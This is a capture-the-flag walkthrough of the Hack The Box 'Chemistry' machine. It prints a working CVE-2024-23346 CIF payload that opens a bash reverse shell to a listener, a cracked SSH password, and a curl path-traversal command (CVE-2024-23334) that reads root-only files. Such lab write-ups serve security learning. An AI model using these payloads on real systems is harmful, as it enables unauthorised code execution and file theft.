Chemistry HTB Walkthrough

Welcome to another Hack the Box exercise. In this walkthrough, I have documented how I pwned the Chemistry machine on Hack the Box. Hack The Box is a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cyber security jobs.

You can also test and grow your penetration testing skills, from gathering information to reporting. If you are new to this blog, please do not forget to like, comment and subscribe to my YouTube channel and follow me on LinkedIn for more updates.

About the Machine

Chemistry is an easy-difficulty Linux machine that showcases a Remote Code Execution (RCE) vulnerability in the pymatgen CVE-2024-23346 Python library by uploading a malicious `CIF` file to the hosted CIF Analyzer website on the target. After discovering and cracking hashes, we authenticate to the target via SSH as rosa user. For privilege escalation, we exploit a Path Traversal vulnerability that leads to an Arbitrary File Read in a Python library called AioHTTP (CVE-2024-23334) which is used on the web application running internally to read the root flag.

Like I have always done in my previous post, the first step in solving a machine is connecting the Kali Linux terminal with Hack the Box server by logging into HTB account and navigating to "Machines" and selecting the machine you want to pwn. In this case, I selected "Chemistry" and download the lab access file and renamed it to chemistry.ovpn

I love doing this because it allows me keep track of all the files I am downloading on my Linux system and also for simplicity (keeping the name short as possible.) After the file was downloaded, I created a directory "ChemistryHTB" on my desktop and moved the file into it. Then, I opened a new terminal and run the following command to connect my terminal with HTB server:

sudo openvpn chemistry.ovpn

The sudo openvpn chemistry.ovpn command connected my Kali Linux terminal and Hack the Box server together. Once the connection has been successfully established, I performed Nmap enumeration to scan for open ports that are available on the target machine. This step is crucial to know what the machine is all about and what the next step to perform is.

I right-clicked on the terminal and chose “split terminal vertically” to open a new terminal. Then, I typed the following command to find the open ports on the target machine IP address:

nmap -sCV -A 10.10.11.38

The nmap scan revealed two opened port: Port 22/tcp (which indicates the target machine is a web app), port 5000/tcp (default port for web servers that run Python-based web applications. It is also used by some network backup software and for running decentralized applications on the Ethereum blockchain network)

nmap scan revealed two open ports: port 22/tcp and port 5000/tcp-udp

After the nmap enumeration has been completed, I added the target IP address to the etc/host file by running the following command:

sudo nano /etc/hosts

This launched the GNU interface and I mapped the IP address 10.10.11.38 to the domain chemistry.htb

To exit the GNU interface, simply hold “Ctrl + X” and press “Y” and “Enter” on the keyboard to save and exit from the GNU editor. Next, I navigated to my Firefox browser and visited 10.10.11.38 or chemistry.htb and the following output was gotten from my visit.

10.10.11.38:5000 was the response from the webpage (with an attached port) The website interface presented two buttons, one for logging in and another to register. So I registered an account with a username and password submission and I tried to login with the same credential.

On the dashboard, the system provided a button to upload a file and also a button to submit it.

The only acceptable file type is .cif. I have no idea what this means so I decided to search on Google. I found out that CIF is an acronym for Crystallographic Information File. Crystallographic Information File (CIF) is a standard text file format for representing crystallographic information, promulgated by the International Union of Crystallography (IUCr).

For every file upload, the first thing that cross my mind is reverse shell. I searched for common vulnerabilities that are associated with CIF and found a few such as CVE-2023-48031, CVE-2024-23346. The CVE-2024-23346 stood out and I decided to find out about the vulnerability by digging deeper.

Summary of the CVE

CVE-2024-23346 features a critical security vulnerability which exists in the JonesFaithfulTransformation.from_transformation_str() method within the pymatgen library. This method insecurely utilizes eval() for processing input, enabling execution of arbitrary code when parsing untrusted input. This can be exploited when parsing a maliciously-created CIF file.

The cause of the vulnerability is in pymatgen/symmetry/settings.py#L97C1-L111C108. The flawed code segment involves a regular expression operation followed by the use of eval().

Vulnerable code

basis_change = [
    re.sub(r"(?<=\w|\))(?=\() | (?<=\))(?=\w) | (?<=(\d|a|b|c))(?=([abc]))", r"*", string, flags=re.X)
    for string in basis_change
]
"""snip"""
([eval(x, {"__builtins__": None}, {"a": a, "b": b, "c": c}) for x in basis_change])

The use of eval, even with __builtins__ set to None, is still a security risk. The BuiltinImporter class can be recovered with subclass traversal.

Proof of Concept

The vulnerability can be exploited as follows:

Create a file vuln.cif with the following contents:

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Then, parse the cif file with the following code:

from pymatgen.io.cif import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()

Alternatively, you can use the complete CIF file I used which worked for me by creating a vuln.cif and pasting the following code in the content.

sudo nano vuln.cif

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1\'");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Make sure to check the IP address of your machine by running ifconfig and change the system("/bin/bash -c 'sh -i >& /dev/tcp/10.10.10.10/4444 0>&1'") accordingly. After modifying the necessary part of the code, I uploaded the vuln.cif file and setup a netcat listener to spawn the reverse shell.

After uploading the vuln.cif file, click on "View" to execute the payload and wait for the response from the netcat listener.

After a few seconds, I got a shell and decided to stabilize it by running:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Chemistry Hack the Box Machine Walkthrough

I got the shell as app@chemistry and I navigated my way around until I found the user.txt file. I tried to read the file by running:

cat user.txt

But the permission failed. I don't have enough privilege to read the file. One thing that caught my eyes while navigating my way around was in the home directory. I found a user rosa in the /home directory and knew I need to get a shell as the user. I searched everywhere and luckily I found a database.db file in static/template/instance directory.

To read the content of the database file, I ran the following command and found a hash file starting with Mrosa:

cat database.db

I copied the hash and attempted to crack it by visited https://crackstation.net. The result of the hashed file was unicorniosrosados. I copied it and attempted to use the password to authenticate rosa by sshing.

I ran the following command and just like magic, it worked and I was able to obtain rosa@chemistry shell by using the password unicorniosrosados to authenticate the user:

ssh rosa@10.10.11.38

After gaining rosa@chemistry shell, I listed all the files in the directory and found three files which include the user.txt and I opened the file by running:

cat user.txt

Hurray!!! I found the user flag.

The next step was trying to obtain the root flag. The first thing I did was to check the list of active listening network connections along with the associated processes by running the following command:

netstat -nltp

I noticed something interesting in the localhost:8080 address and decided to dig deeper. Then, I tried setting up a local port forwarding tunnel via SSH by running the following command in the terminal:

ssh -L 7000:127.0.0.1:8080 rosa@10.10.11.38

ssh -L 7000:127.0.0.1:8080 rosa@10.10.11.38

It connects to the remote machine at 10.10.11.38 as user rosa, and forwards the local port 7000 to 127.0.0.1:8080 on the remote machine.

Afterwards, I sent an HTTP HEAD request to localhost on port 8080 by running the following command:

curl localhost:8080 --head

This is useful for quickly checking if a server is up and what headers it returns (status code, content-type, etc.) Then I tried to exploit the path traversal vulnerability, which happens when a server improperly handles file paths and allows an attacker to access files outside the intended directory by running the following command:

curl -s --path-as-is http://localhost:8080/assets/../../../../root/root.txt

Breakdown:

curl -s: Runs curl silently.
--path-as-is: Tells curl not to normalize the URL path.
http://localhost:8080/assets/../../../../root/root.txt: The URL attempts to go up four directories (../../../../) and access /root/root.txt.

Hurry!!! I got the root flag

chemistry hack the box machine walkthrough writeup

Congratulations if you made it this far. If you enjoy reading my writeups, kindly subscribe to my channel and follow me on my social media handles:

YouTube channel: https://m.youtube.com/@BoltechTechnologies1

LinkedIn: https://www.linkedin.com/in/isiaq-ibrahim-468588156/

Twitter at https://x.com/BoltechNG

Follow me on Medium: https://medium.com/@boltech

This walkthrough was first published on Medium on October 23rd 2024. The walkthrough had 6 views and 2 reads on Medium before it was suspended by Medium and Hack the Box for uploading spoiler.